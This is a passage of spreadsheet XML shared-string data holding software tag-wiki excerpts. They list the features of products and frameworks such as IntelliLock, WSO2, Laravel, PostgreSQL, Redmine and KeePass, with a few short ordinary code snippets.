Visual Studio 2005/2008/2010/2012/2013 integration via the IntelliLock automation Add-In
Assembly merging/packing functionality
Assembly Protection
Comprehensive Obfuscation features
String Encryption
Anti Tamper Protection
Suppress ILDASM
Strong Name Removal Protection
IL Code Encryption
Control Flow Obfuscation
Invalid Metadata Injection
Full 64bit assembly support
Includes protection and licensing support for ASP.NET, Compact Framework, Silverlight and Mono
Ability to lock/unlock/protect your assemblies without adding one single line of code
Command Line support
Intuitive graphical user interface
100% managed solution - No native code is used to lock/protect your software</t>
  </si>
  <si>
    <t>Storage/Database Management</t>
  </si>
  <si>
    <t>Features
Define and Execute Business Processes
Supports WS-BPEL 2.0 and BPEL4WS 1.1
Long running stateful processes
Short running stateless or stateful processes
In memory process execution for short running processes
Message and time triggered message handling
Processes secured with WS-Security, Kerberos and more
Security context propagation through processes to partners
Secure invocation of partners with WS-Security, Kerberos and more
Data Manipulation &amp; Extensibility
Powerful data manipulation via XPath 1.0/2.0, XSLT 1.0/2.0, XQuery 1.0 and E4X
Extensible via custom activities defined using Java APIs
XPath extensions for Java invocation
Define Workflows Interacting with People
Supports WS-Human Task 1.1, BPEL4People 1.1
Integration of people for performing tasks and receiving notifications
Management of deadlines and escalation to other users and roles (including integration to WSO2 Identity Server for user and role management)
Role based access control for activities
Google Gadget for interacting with task manager and for task execution
Ability to create custom user interfaces for tasks
Create &amp; Monitor Custom Key Performance Indicators (KPIs)
Extension activity for selectively publishing events from any process to WSO2 Business Activity Monitor
Define KPIs to run in WSO2 Business Activity Monitor and generate custom  gadgets for dashboards or reports
Graphical Process Modeling
Powerful graphical editor via WSO2 Developer Studio
Drag-n-drop visual editor for any WS-BPEL process model including XPath assistant
Store, lifecycle manage and govern processes, partners and endpoints via integration with WSO2 Governance Registry
Create and manage process deployment artifacts
Import and edit BPEL processes developed using other tools such as SoftwareAG ARIS, Oracle SOA Suite, Microsoft BizTalk and IBM Process Manager
Process Management via Graphical Administration Console
Flexible deployment and management of processes including security, throttling and caching
Process versioning including dynamic updates to running processes
Flexible management of process instances including terminate, suspend, resume, retry and cleanup
Graphical auditing and troubleshooting of instances
Dashboard with snapshot of failed, suspended, active and long running instances
Integrates to Existing Environment
Pluggable storage choices including MySQL, Oracle, MSSQL and DB2
Use any existing enterprise identity system including LDAP, Microsoft  -  Active Directory or any JDBC database
Task manager API for integrating human tasks to any enterprise infrastructure including portals and e-mail clients
High Availability, Scalability and Stability
Horizontal scaling via clustering with stateless server architecture
Distributed response caching for higher performance
Supports highly available deployment
Process dehydration for running large volumes of processes
Long term execution stability via configurable persistence levels with low resource utilization
Lightweight, Developer Friendly and Easy to Deploy
Easy to debug processes with tools for message tracing and interactive testing with TryIt capabilities
Server customization via feature provisioning of any WSO2 middleware capability
Choice of deployment to on-premise servers, private cloud, or managed cloud, without configuration changes
Integrated with SVN, Maven, Ant and other standard tools for development &amp; deployment
Integrated to WSO2 Developer Studio, Eclipse-based IDE for all WSO2 products
Manage &amp; Monitor
Comprehensive management &amp; monitoring Web console with enterprise-level security
Built-in collection and monitoring of standard access and performance statistics
JMX MBeans for key metrics monitoring and management
Integrates with WSO2 Business Activity Monitor for operational audit and KPI monitoring and management
Flexible logging support with integration to enterprise logging systems
Centralized configuration management across different deployment environments with lifecycles and versioning via integration to WSO2 Governance Registry</t>
  </si>
  <si>
    <t>Manage &amp; Monitor
Comprehensive management &amp; monitoring Web console with enterprise-level security
Built-in collection and monitoring of standard access and performance statistics
JMX MBeans for key metrics monitoring and management
Integrates with WSO2 Business Activity Monitor for operational audit and KPI monitoring and management
Flexible logging support with integration to enterprise logging systems
Centralized configuration management across different environments with lifecycles and versioning via integration to WSO2 Governance Registry
User based authorization support for queues
Role based authorization support for topics</t>
  </si>
  <si>
    <t>Features
A full stack MVC framework 
Unbeatable development experience with great performance 
Dependency injection 
SPA/Mobile app support 
Uncompromised security 
Annotation aware but not annotation stack 
Multi-environment configuration 
Simple yet powerful database support 
Multiple database support 
Powerful view architecture with multiple render engine support 
Misc features 
More information on how to use this wonderful framework are found on the Act framework website.</t>
  </si>
  <si>
    <t>Data Governance and Metadata framework for Hadoop
Features
Data Classification
Import or define taxonomy business-oriented annotations for data
Define, annotate, and automate capture of relationships between data sets and underlying elements including source, target, and derivation processes
Export metadata to third-party systems
Centralized Auditing
Capture security access information for every application, process, and interaction with data
Capture the operational information for execution, steps, and activities
Search &amp; Lineage (Browse)
Pre-defined navigation paths to explore the data classification and audit information
Text-based search features locates relevant data and audit event across Data Lake quickly and accurately
Browse visualization of data set lineage allowing users to drill-down into operational, security, and provenance related information
Security &amp; Policy Engine
Rationalize compliance policy at runtime based on data classification schemes, attributes and roles.</t>
  </si>
  <si>
    <t>It includes among its features
Integrates presentation layer and server side business and persistence logic transparently
Dependency injection
Universal contextual model
Built-in persistence layer by using mediator pattern
Transaction management
A powerful event model
Bult-in Security model
Built-in application generator (customizable)
Because it fulfills some of the missed features of Java technologies such as JavaServer Faces (presentation layer) and Enterprise Java Beans (server side business logic), Seam has positioned itself as the prototype for Java EE specifications such as Contexts and Dependency Injection for the Java EE platform (contextual model), JavaServer Faces 2.0 JSR-314 (presentation layer) and Bean validation JSR-303 (validation).</t>
  </si>
  <si>
    <t>(See iOS 8 API Differences) iOS 8 allows developers to further customize the user experience with major extensibility features additions:
Notification Center widgets
Third-party keyboards
App extensions
This release also introduces robust frameworks such as:
HealthKit
HomeKit
LocalAuthentication
Photos
CloudKit
iOS 8 also includes Metal, a new graphics technology that maximizes the performance of the A7 chip with 10x performance and Swift, a powerful new programming language.</t>
  </si>
  <si>
    <t>Service Dates 
Additional products built on or extending WebSphere MQ
IBM Integration Broker
IBM MQ Extended Reach (MQTT)
IBM MQ Light (AMQP)
WebSphere Message Broker
WebSphere MQ Advanced Message Security (Now integrated into IBM MQ)
WebSphere MQ File Transfer Edition (Now integrated into IBM MQ)
WebSphere MQ Low Latency Messaging
WebSphere MQ Telemetry  
Miscellaneous Notes
As of WebSphere MQ v7.5, WebSphere MQ Advanced Message Security was integrated into WebSphere MQ and sold as an entitlement rather than separately delivered code.</t>
  </si>
  <si>
    <t>Knockout Validation allows for validation of knockout.js view model observables through extenders with:
Native rules
Custom defined rules
Custom inline rules
The plugin also supports Asynchronous Validation.</t>
  </si>
  <si>
    <t>Oracle ADF Key Concepts
Oracle ADF is based on the following concepts:
Rich component sets for web, mobile, and desktop clients
Declarative and reusable business logic and validation
Declarative data binding
Separation of UI-related and data-related elements (MVC architecture)
Enhanced page flow functionality, including modular and reusable task flows
Declarative security on ADF resources
Customer level and developer level customization through metadata
Oracle ADF Key Components
This section provides a synopsis of the central high-level components in the ADF stack, including some of the underlying technologies such as JavaServer Faces (JSF) as well as other business and data services that are commonly part of an application.</t>
  </si>
  <si>
    <t>Features:
CRUD and search operations for entities
very rich and responsive UI (using ASP.net MVC Awesome jQuery Ajax
Helpers)
upload and crop Images for meals (using Jcrop)
mapping entities &lt;-&gt; viewmodels (using ValueInjecter)
Multi-Language User Interface
N-Tier Architecture
Security using Forms Authentication
pagination using "more results" button
Multiple UI themes (using jQuery UI themes)
Unobtrusive Client Side Validation using jQuery.Validate
Nice validation messages using just CSS</t>
  </si>
  <si>
    <t>Features
(H)MVC implementation
Full HMVC implementation
ViewModels to get the View-specific logic out of your Views and Controllers
Route directly to closures (from v1.1)
Modular and Extendable Core/Packages/Applications
Extend or replace Core classes without rewriting a single line of code
Package additional functionality into Packages
Create modular application by dividing it up into Application Modules
Security
Output encoding
Input filtering
XSS filtering
CSRF token protection
SQL injection prevention
OIL: The power of (optional) command line
Code generation and Scaffolding
Run Database Migrations
Interactive Debugging
Tasks - useful for CRON and Importing Data
ORM
OO way of working with database data and performing CRUD operations
All normal relationship types: belongs-to, has-one, has-many, many-many ("has and belongs to many")
Fetch relations of relations of relations of...etc... in one go ("nested relations")
Use Observers to update/process the objects instances, for example to validate before saving or to auto-update an updated_at property
The only ORM to support Temporal rows
Soft delete out of the box
Authentication Framework
Included simple authentication for users, groups &amp; basic ACL
Secure hashing function for passwords included (PBKDF2)
Default interface for any Auth library in Fuel
Template Parsing Libraries
There are drivers included for the following libraries:
Mustache
Markdown
Smarty
Twig
Haml
Jade
Dwoo
Current Version: 1.7.3 (released 2015-05-21)
Website: http://fuelphp.com
Documentation: http://fuelphp.com/dev-docs
API: http://fuelphp.com/dev-api</t>
  </si>
  <si>
    <t>Core features:
Auto-generated Swagger 2.0 
Seamless integration of swagger-ui
Reflection-based Schema generation for describing API types
Extensibility hooks for customizing the generated Swagger doc
Extensibility hooks for customizing the swagger-ui 
Out-of-the-box support for leveraging Xml comments 
Support for describing ApiKey, Basic Auth and OAuth2 schemes ... including UI support for the Implicit OAuth2 flow
The Swashbuckle tag should be used for questions about:
Configuring Swashbuckle
Extending Swashbuckle with the interfaces , IOperationFilter and IDocumentFilter
Customizing the embedded Swagger-UI 
Questions specifically addressing Swagger or Swagger-UI should not be tagged with the Swashbuckle tag.</t>
  </si>
  <si>
    <t>Features
HTTP 1.0 and HTTP 1.1 capable
Supports IPv6
Multithreaded Support
Supports generating stress from multiple machines
Extensible through C plug-in DLLs
Supports Performance Counter integration
Measures throughput and response time
Supports SSL requests
NTLM Authentication request support
Easily supports testing thousand of concurrent users
Benefits
Very light weight (low hardware requirements)
Extensible to handle any aspect of the HTTP request or response
Allows remote collection of perfmon data and registry</t>
  </si>
  <si>
    <t>A SQL editor/IDE with a workflow to
create visualizations out of any result set 
A security model allowing rules on who can access which product
features and datasets, as well as integration with major
authentication backends (including OpenID, LDAP, OAuth, REMOTE_USER) 
A lightweight semantic layer, allowing to control how data sources
are exposed to the user by defining dimensions and metrics  
Out of the box support for most SQL-speaking databases
Superset is an Apache project.</t>
  </si>
  <si>
    <t>The ARMv8 architecture maintains compatibility with the comprehensive software ecosystem for 32-bit components enabling a wealth of software optimized for existing ARM processors to benefit from the enhanced performance of processors based on the ARMv8 architecture, while the addition of 32-bit cryptographic instructions enable further optimization for emerging requirements.</t>
  </si>
  <si>
    <t>Functions performed by PanFS include easy central management, linear scalability, data reliability, automatic load balancing, enterprise-grade data protection, high availability, and robust multiprotocol support for the most demanding enterprise and research technical computing applications.</t>
  </si>
  <si>
    <t>Features:
Activity timeline
SSH and HTTP/HTTPS protocols
SMTP/LDAP/Reverse proxy authentication
Reverse proxy with sub-path
Account/Organization/Repository management
Add/Remove repository collaborators
Repository/Organization webhooks (including Slack and Discord)
Repository Git hooks/deploy keys
Repository issues, pull requests, wiki and protected branches
Migrate and mirror repository and its wiki
Web editor for repository files and wiki
Jupyter Notebook
Two-factor authentication
Gravatar and Federated avatar with custom source
Mail service
Administration panel
Supports MySQL, PostgreSQL, SQLite3, MSSQL and TiDB (via MySQL protocol)
Multi-language support (25 languages)</t>
  </si>
  <si>
    <t>Features
Configurable via data-api and standard HTML5 attributes
Submit is disabled until the form is valid and all required fields are complete
Customizable error messages
Custom validator functions
Validation of an input field via AJAX
Useful links:
Examples and usage at: http://1000hz.github.io/bootstrap-validator/
Github repo: https://github.com/1000hz/bootstrap-validator</t>
  </si>
  <si>
    <t>Features:
advanced L4-7 load balancing and traffic management;
application acceleration such as HTTP compression and caching; 
integrated application firewall for application security;
NetScaler solutions combine high-speed load balancing and content switching, http compression, content caching, SSL acceleration, application flow visibility and a powerful application firewall into an integrated, easy-to-use platform.</t>
  </si>
  <si>
    <t>Features
Define your validation rules using attributes on model properties, e.g.,
[Required] [StringLength(50)] public string Name { get; set; }
(Or, if you prefer, you can supply rules programmatically or you can just hard-code them in specific views)
Designed to fit into ASP.NET MVC conventions for handling form posts
and storing and retrieving error information in ModelState
Use your choice of server-side validation framework.</t>
  </si>
  <si>
    <t>Feature Overview
ModelViewController (MVC) framework
Simple routing using Closures or Controllers
Views and templating
Built-in Blade templating engine
Driver based session and cache handling
Database abstraction with query builder
Eloquent ORM
Error Handling
Redis framework integration and API
Reverse Routing
Inversion of control (IoC) container
Middleware
Authentication
Authorization
Database Migrations
PHPUnit Integration
Automatic Pagination
Bundles
Queue system
Events and Filters
Task Scheduling
Accessors and Mutators
Markdown Mailables
Notifications
Documentation
Laravel 6.0 Documentation (Official)
Laravel 5.8 Documentation (Official)
Laravel 5.7 Documentation (Official)
Laravel 5.6 Documentation (Official)
Laravel 5.5 Documentation (Official)
Laravel 5.4 Documentation (Official)
Laravel 5.3 Documentation (Official)
Laravel 5.2 Documentation (Official)
Laravel 5.1 Documentation (Official)
Laravel 5 Documentation (Official)
Laravel 4.2 Documentation (Official)
API Documentation
Laravel 6.0 API
Laravel 5.8 API
Laravel 5.7 API
Laravel 5.6 API
Laravel 5.5 API
Laravel 5.4 API
Laravel 5.3 API
Laravel 5.2 API
Laravel 5.1 API
Laravel 5 API
Laravel 4.2 API
Laravel 4.1 API
Laravel 4 API
Other notable tags
laravel-3
laravel-4
laravel-5
laravel-5.1
laravel-5.2
laravel-5.3
laravel-5.4
laravel-5.5
laravel-5.6
laravel-5.7
laravel-5.8
laravel-6
laravel-cashier
laravel-dusk
laravel-echo
laravel-elixir
laravel-envoy
laravel-horizon
laravel-mix
laravel-nova
laravel-passport
laravel-scout
laravel-socialite
laravel-valet
blade
eloquent
homestead
lumen
spark
laravel-telescope
laravel-vapor
laravel-ui
Community
Laravel.io Forum
GitHub Repository
Laracasts Forums
LaraChat
Laravel Old Archive Forum
LaraJobs
Podcast
The Laravel Podcast
Resources and Tutorials
Scotch.io: Tutorials
Code Happy: Laravel book by Dayle Rees
Laravel Starter: Laravel book by Shawn McCool
Creating a Blog in Laravel from Scratch
Nettuts+ Tag about Laravel
Fideloper Laravel Tag
Jason Lewis' Tutorials
Laravel 4  simple website with backend tutorial
Laracasts - Laravel Screencasts by Jeffrey Way
Sheikh Heera's Blog (Tag - Laravel)
Laravel.sl - Fast French tutorial
Awesome Laravel
Installation steps
Cachet
Introduction to Laravel (Persian)
Laravel News
Test Driven Laravel (by Adam Wathan)
Behaviour Driven Development in Laravel
Laravel Best Practices
Laravel Up and Running
Diving Laravel
Laravel Core Adventures
Performant Laravel
Laravel 4
Code Bright by Dayle Rees
From Apprentice To Artisan by Taylor Otwell
Laravel Testing Decoded by Jeffrey Way
Implementing Laravel by Chris Fidao
Laravel Application Development Blueprints by Arda Klda and Halil brahim Ylmaz
Laravel was created and development is lead by Taylor Otwell</t>
  </si>
  <si>
    <t>What is new:
New Whoops integration
Streamlined Request Validation
Fresh Migrations
Frontend Presets
Automatic Package Discovery
Silky Smooth Custom Validation Rules
Collection Dumping
Model Factory Generation
Custom Blade "If" Directives
Auto-Registering Artisan Commands
Higher Order Tap
Optional Objects
New API Resources
Resources:
Release notes about 5.5
Upgrade guide for 5.5
What's new in Laravel 5.5 on Laracasts</t>
  </si>
  <si>
    <t>Feature Overview
Multiple projects support
Flexible role based access control
Flexible issue tracking system
Gantt chart and calendar
News, documents &amp; files management
Feeds &amp; email notifications
Per project wiki
Per project forums
Time tracking
Custom fields for issues, time-entries, projects and users
SCM integration (SVN, CVS, Git, Mercurial and Bazaar)
Issue creation via email
Multiple LDAP authentication support
User self-registration support
Multi-language support
Multiple databases support
REST API
Plugins
Documentation &amp; Links
Live Demo
Redmine Guide
Developer's guide
Plugins
FAQ
Third-party Tools
Theme List</t>
  </si>
  <si>
    <t>Code Search
Package Management
Agile Improvements
Dashboards and Widget Improvements
Git Improvements
Build Improvements
Release Management Improvements
Test Improvements
Marketplace Improvements
Administration Improvements
Personal Access Tokens
Known Issues</t>
  </si>
  <si>
    <t>Features include:
All HTTP methods
High-level hyperlink and HTML form support, without having to parse HTML yourself
SSL support
Automatic cookies
Custom HTTP headers
Automatic handling of redirections
Proxies
HTTP authentication
Mech supports performing a sequence of page fetches including following links and submitting forms.</t>
  </si>
  <si>
    <t>A SQL editor/IDE with a workflow to
create visualizations out of any result set 
A security model allowing rules on who can access which product
features and datasets, as well as integration with major
authentication backends (including OpenID, LDAP, OAuth, REMOTE_USER) 
A lightweight semantic layer, allowing to control how data sources
are exposed to the user by defining dimensions and metrics  
Out of the box support for most SQL-speaking databases
Resources: 
official site
project in github</t>
  </si>
  <si>
    <t>Impalas goal is to combine the familiar SQL support and multi-user performance of a traditional analytic database with the scalability and flexibility of Apache Hadoop and the production-grade security and management extensions of Cloudera Enterprise.</t>
  </si>
  <si>
    <t>Notable features
Teach your browser new tricks by adding behavior to HTML tags/attributes
Controllers provide code-behind DOM with clear separation from the view
Two-way data binding without the need to extend or wrap the model objects
Dependency injection assembles the application without  method
Promises/futures remove many callbacks from code when communicating with the server
Directives
Views and routes
Filters
Form validation
Strong focus on testability
Extend HTML with your own behavior    
Angular uses spinal-case for its custom attributes and camelCase for the corresponding directives which implement them
Versions
Notable AngularJS versions, code names, and release dates include:
Latest Stable Version:
AngularJS v1.7.4   [interstellar-exploration]      (September 07, 2018)
Actively developed Version:
AngularJS v1.7.x  
For code names, release dates and notes visit the GitHub changelog.</t>
  </si>
  <si>
    <t>ASP.NET MVC, Razor Pages, Web API, Web Forms
The primary feature areas provided by CSLA .NET are:
Business rules: CSLA .NET includes a rules engine supporting business, validation, and authorization rules.</t>
  </si>
  <si>
    <t>This replication framework provides a comprehensive set of features:
Master  Slave replication
Master  Master replication
Filtered Replication
Incremental replication with bi-directional conflict detection/resolution
These replication features can be used in combination to create powerful solutions to many problems in the IT industry, like reliability, and scalability.</t>
  </si>
  <si>
    <t>It makes it easy to link up your choice of server-side validation mechanism with your choice of client-side validation library, neatly fitting both into ASP.NET MVC architecture and conventions.</t>
  </si>
  <si>
    <t>It focuses mainly on :
security
User experience
Performance
Feature set
Size
Features
Connect to a database server with username and password
Select an existing database or create a new one
List fields, indexes, foreign keys and triggers of table
Change name, engine, collation, auto_increment and comment of table
Alter name, type, collation, comment and default values of columns
Add and drop tables and columns
Create, alter, drop and search by indexes including fulltext
Create, alter, drop and link lists by foreign keys
Create, alter, drop and select from views
Create, alter, drop and call stored procedures and functions
Create, alter and drop triggers
List data in tables with search, aggregate, sort and limit results
Insert new records, update and delete the existing ones
Supports all data types, blobs through file transfer
Execute any SQL command from a text field or a file
Export table structure, data, views, routines, databases to SQL or CSV
Print database schema connected by foreign keys
Show processes and kill them
Display users and rights and change them
Display variables with links to documentation
Manage events and table partitions (MySQL 5.1)
Schemas, sequences, user types (PostgreSQL)
Extensive customization options
Requirements
Works with MySQL, PostgreSQL, SQLite, MS SQL, Oracle, SimpleDB, Elasticsearch, MongoDB
Supports PHP 5 with enabled sessions
Available in Arabic, Catalan, Chinese, Czech, Dutch, English, Estonian, French, German, Hungarian, Italian, Japanese, Lithuanian, Persian, Polish, Portuguese, Romanian, Russian, Serbian, Slovak, Slovenian, Spanish, Tamil, Turkish, Ukrainian, ... (32)
Free for commercial and non-commercial use (Apache License or GPL 2)
Links
Website</t>
  </si>
  <si>
    <t>Among new major features available in this release - from the docs:
Block-Range Indexes (BRIN) which enable compact indexing of very    large tables
Large speed improvements in in-memory sorting and    hashing
Automated management of transaction log size
INSERT ON CONFLICT UPDATE, otherwise known as "UPSERT"
Grouping Sets, CUBE and ROLLUP analytic operations
Row-Level Security (RLS) support
More JSONB data manipulation functions and operators
Added the pg_rewind tool and other high availability improvements to replication
Multiple enhancements to Foreign Data Wrappers, including IMPORT FOREIGN    SCHEMA
Large increases in multi-core and large memory scalability
Use this tag for questions specific to any of the above new features.</t>
  </si>
  <si>
    <t>Its wiki lists its capabilities
Run as embedded DB inside the JVM
Json Document storage
User security and granting model
Optionally full in memory model
REST interface
Complete Querying functionality
High concurrency environment
Stackable components allow great flexibility
Extensible</t>
  </si>
  <si>
    <t>The Firebase security rules combine an expression-based server-side  rules language with a flexible client-side authentication system to provide a very flexible security model.</t>
  </si>
  <si>
    <t>Data Annotations are used by frameworks such as ASP.NET MVC to enable a model-based validation approach and enforce consistent validation throughout the application, both on client and server side.</t>
  </si>
  <si>
    <t>The validation rules may be implemented through the automated facilities of a data dictionary, or by the inclusion of explicit application program validation logic, or by the some validation framework.</t>
  </si>
  <si>
    <t>Major enhancements in PostgreSQL 10 include:
Logical replication using publish/subscribe
Declarative table partitioning
Improved query parallelism
Significant general performance improvements
Stronger password authentication based on SCRAM-SHA-256
Improved monitoring and control
Note that as of version 10, PostgreSQL has moved from 3 component version ids to 2 components, so 10.1 is a minor release.</t>
  </si>
  <si>
    <t>It includes Java libraries, License Manager tool, Auto License Generation and Activation Server application and Floating License Server for generation and validation of license text, license keys, and floating license files.</t>
  </si>
  <si>
    <t>Improvements include, but are not limited to:
performance improvements for partitioning and indexes
CTEs ( queries) are by default inlined for better query performance
JSON path queries per SQL/JSON specification
support for case- and accent-insensitive ICU collations
(stored) generated columns
extended statistics for most common values
page checksums can be enabled and disabled without initdb
authentication: support for encrypted GSSAPI authentication and LDAP server discovery
pluggable storage to add different table storage methods
More information regarding the release is available here.</t>
  </si>
  <si>
    <t>Highlights include:
List item
Sorting, filtering, highlighting for tables, trees, and lists
Find/ search
Auto-completion
Login/ authentication framework
TreeTable component
Collapsible panel component
Date picker component
Tip-of-the-Day component 
While it was planned to have many of these features to be incorporated into the Swing toolkit, Swing itself has been put into maintenance mode, with JavaFX being the actively developed UI toolkit shipped with JDK.</t>
  </si>
  <si>
    <t>You can enable validation by setting the $validate instance to the usual form validation library rules array:
class User_model extends MY_Model
{
    public $validate = array(
        array( 'field' =&gt; 'email', 
               'label' =&gt; 'email',
               'rules' =&gt; 'required|valid_email|is_unique[users.email]' ),
        array( 'field' =&gt; 'password',
               'label' =&gt; 'password',
               'rules' =&gt; 'required' ),
        array( 'field' =&gt; 'password_confirmation',
               'label' =&gt; 'confirm password',
               'rules' =&gt; 'required|matches[password]' ),
    );
}
Anything valid in the form validation library can be used here.</t>
  </si>
  <si>
    <t>ASCII terminal-based applications can now benefit from Java features such as object orientation, multithreading, automatic garbage-collection, and a vast range of libraries such as:   
socket and HTTP networking using Java 2 Standard Edition (J2SE)
SSL and HTTPS encryption using Java Secure Socket Extension (JSSE)
asynchronous messaging using Java Message Service (JMS)
database access using Java Database Connectivity (JDBC)
mail access using JavaMail
XML parsing and generation using Xerces from Apache.org</t>
  </si>
  <si>
    <t>The components of the suite benefit from common capabilities including consistent tooling, a single deployment and management model, end-to-end security and unified metadata management.</t>
  </si>
  <si>
    <t>Secure defaults without compromising usability
Everything is replaceable and customisable
Immutable infrastructure applied to building Linux distributions
Completely stateless, but persistent storage can be attached
Easy tooling, with easy iteration
Built with containers, for running containers
Designed to create reproducible builds [WIP]
Designed for building and running clustered applications, including but not limited to container orchestration such as Docker or Kubernetes
Designed from the experience of building Docker Editions, but redesigned as a general-purpose toolkit
Designed to be managed by external tooling, such as Infrakit or similar tools
Includes a set of longer-term collaborative projects in various stages of development to innovate on kernel and userspace changes, particularly around security
LinuxKit currently supports the , arm64, and s390x architectures on a variety of platforms, both as virtual machines and baremetal (see below for details).</t>
  </si>
  <si>
    <t>Features:
Tokenization (165 Languages)
Language detection (196 Languages)
Named Entity Recognition (40 Languages)
Part of Speech Tagging (16 Languages)
Sentiment Analysis (136 Languages)
Word Embeddings (137 Languages)
Morphological analysis (135 Languages)
Transliteration (69 Languages)</t>
  </si>
  <si>
    <t>Project site: http://keepass.info/
Main features:
Strong Security
Multiple User Keys
Portable and No Installation Required, Accessibility
Export To TXT, HTML, XML and CSV Files
Import From Many File Formats
Easy Database Transfer
Support of Password Groups
Time Fields and Entry Attachments
Auto-Type, Global Auto-Type Hot Key and Drag&amp;Drop
Intuitive and Secure Clipboard Handling
Searching and Sorting
Multi-Language Support
Strong Random Password Generator
Plugin Architecture</t>
  </si>
  <si>
    <t>(eg: safe is true by default for all queries)
Connection
To set global multi-doc at db level
db.options.multi = true;
To set global multi-doc at collection level
db.get('users').options.multi = false;  
Close DB connection
db.close(); 
Operations 
var collection = db.get('collection');    
collection.insert({ }, function(err) { });
collection.find({ }, function(err, docs) { });
collection.findOne({ }, function(err, doc) { });
collection.update({ }, { }, function(err, docs) { });
collection.findAndModify({ }, { }, function(err, docs) { });
collection.findById('id', function(err, doc) { });
collection.drop(function(err) { });
Index
collection.index('name.first', function() { });
Unique Index
collection.index('email', { unique: true });  
Compound Index
collection.index('name.first name.last')   
Compound with sort
collection.index({ 'email': 1, 'password': -1 }); 
To get indexes for a collection
collection.indexes(fn);
Drop an index
collection.dropIndex(name, fn);
Drop all indexes
collection.dropIndexes(fn);</t>
  </si>
  <si>
    <t>Notable additions in this release include:
Ability to set breakpoints and watches within XAML markup
Data-binding capability in XAML style tags
"Trusted Application" model allowing more permissions to in-browser applications, including full access to the file system
Microsoft's "What's New" page with downloads and tutorials:
http://www.silverlight.net/learn/overview/what's-new-in-silverlight-5
For general information on Silverlight, see the Stack Overflow wiki:
http://stackoverflow.com/tags/silverlight/info</t>
  </si>
  <si>
    <t>Postgres advertises the following features:
Multi-Version Concurrency Control; 
point in time recovery;
tablespaces;
asynchronous replication;
nested transactions (savepoints);
online/hot backups
as well as other desirable features.</t>
  </si>
  <si>
    <t>UWS is more modern and supports all ASP.NET versions including 4, and also supports SSL &amp; certificate management, port sharing, compression, multiple host processes, 32-bit and 64-bit applications, restricted and relaxed user security contexts, automatic crash recovery, can serve as Visual Studio debug web server instead of WebDev, and integrates with Install Shield, Visual Studio Setup Project, Advanced Installer, and other installation authoring tools.</t>
  </si>
  <si>
    <t>What is new:
LTS (Long Term Support)
PSR-2 compliance
Event broadcasting
Middleware parameters
Model factories
Overhauled testing with new helper traits and a new expressive fluent interface for integration tests
Blade service injection
Artisan improvements for simplified command signatures and advanced output forms
CSRF whitelisting
Laravel Envoy allows you to run local scripts without SSH
Laravel Elixir compiles ECMAScript 6 by default
Backwards-compatible folder structure changes
Completely overhauled documentation
5.1.4: Authentication throttling
5.1.11: ACL (Access Control List) authorization
Resources:
Laravel 5.1 release notes
Upgrade guide for Laravel 5.1
Overview of new Laravel 5.1 features and changes on Laravel News
What's new in Laravel 5.1 on Laracasts</t>
  </si>
  <si>
    <t>the features of RAD PDF are:
Web Browser Based PDF Reader
Client-Side PDF Editor
Feature Rich PDF Form Filler
Interactive PDF Form Designer
Protect &amp; Secure PDF Content
Integrate PDF Into Your Workflow
Enterprise Ready ASP.NET Control
Supported Browsers
Firefox
Internet Explorer
Apple Safari
Opera
Google Chrome
Server Requirements
Windows Server
IIS Running ASP.NET
Microsoft SQL Server
You should use this tag if your question is related to the usage of RAD PDF in the environment mentioned above.</t>
  </si>
  <si>
    <t>Living on the edge
There are a set of interesting links on the symfony blog about what's new in this version:
Service Auto Wiring
LDAP component
Console improvements
Symfony as a Microframework
Form improvements
Console Style Guide
Redesigned Web Debug Toolbar
The Release Process explained
Version Checker
DX (Developer Experience) Improvements
Simpler Security Voters
Streamlined Log Files
Clock mocking and time sensitive tests
YAML deprecations
Translator improvements
DependencyInjection improvements
VarDumper improvements
Deprecating Scopes and Introducing Shared Services
Polyfill Components
Final improvements</t>
  </si>
  <si>
    <t>Yii is an open-source php framework under BSD license with all the common features needed to build fast, scalable and feature-rich Web-2.0 applications:
MVC, DAO/ActiveRecord, I18N/L10N, APC (Advanced PHP caching), DB migrations, authentication and role-based access control, scaffolding, testing, ...
As a framework, Yii is heavily inspired by Ruby on Rails.</t>
  </si>
  <si>
    <t>Among other features, it provides:
A RESTful HTTP/JSON API accessible from many programming libraries and tools
Futon, a browser based GUI and management tool
Incremental and flexible replication with conflict management
Incremental Map/Reduce queries written in any language (JavaScript support built-in)
Excellent data integrity/reliability
Native support for BLOBs (Binary Large Objects)
Easy installation on many platforms, from servers to mobile devices
A strong and active community
Good documentation in the form of Books, Presentations, Blog Posts, Wikis, and more
Because the data stored in CouchDB is a JSON document(s), the structure of the data, or document(s), can change dynamically.</t>
  </si>
  <si>
    <t>Custom validation - RadUpload makes it easy to provide your own custom validation, both server-side, or client-side using ASP.NET validators.</t>
  </si>
  <si>
    <t>Este.js
Truly universal architecture
code shared across platforms (browser, server, native mobile)
server side rendering or server-less pre-rendering to HTML files
universal routing
universal internationalization (with runtime language switching)
universal crash reporting (via Sentry)
universal data fetching
universal forms with universal validation (universal ftw, yeah)
Well tuned dev stack (OS X, Linux, Windows)
Immutable app state
Stateless functional UI components with JavaScript styles
Flowtype
Vanilla hot reloading makes everything hot reloadable
Firebase integration (este.firebaseapp.com)
useful predefined Redux actions
email and facebook login
declarative queryFirebase higher order component for Firebase imperative API
user presence
Este is monorepo, read why.</t>
  </si>
  <si>
    <t>The codebase is of high quality and supports features as partial page rendering (ajax), integrated clientside validation, Section 508 accessibility, LTR languages, etc.</t>
  </si>
  <si>
    <t>The forms to be generated can be packed with a lot of features like cross-field-validation, datatype entry validation, visual actions and many other business rules just by defining a XUI (eXtensible User Interface).</t>
  </si>
  <si>
    <t>In addition Nexus provides a user interface around the administrative and user related tasks such a searching components and provides further features like support for release process, control over available artifacts, audit and security controls.</t>
  </si>
  <si>
    <t>It features, among other things:
Cloud-based web and worker processes ("dynos")
Hosted datastores (both shared and dedicated)
A Git-based deployment strategy
A number of services offered as add-ons
Support for other languages through buildpacks
Secure, environment-specific configuration
A fully managed, multi-tenant architecture
A full API
Git-based deployment strategy
Applications on Heroku are managed with Git.</t>
  </si>
  <si>
    <t>Java Servlets 3.0 is a new API that supports extensibility/pluggability, Ease of Development (EoD) using the newer language features, Async and Comet support, Security, and other features being as part of the revision for Java EE 6.</t>
  </si>
  <si>
    <t>Services included are IBM Push Notifications, Mobile Analytics, Mobile Client Access, and Mobile Quality Assurance, which enable you to: manage push notification subscriptions, authenticate users, monitor app performance, capture live-user experiences, and view quality metrics.</t>
  </si>
  <si>
    <t>These include session management, image manipulation, PDF creation, XML generation and processing, security, date manipulation, and more.</t>
  </si>
  <si>
    <t>New features of the 3.3 java driver included:
Cluster Monitoring in the synchronous and asynchronous drivers
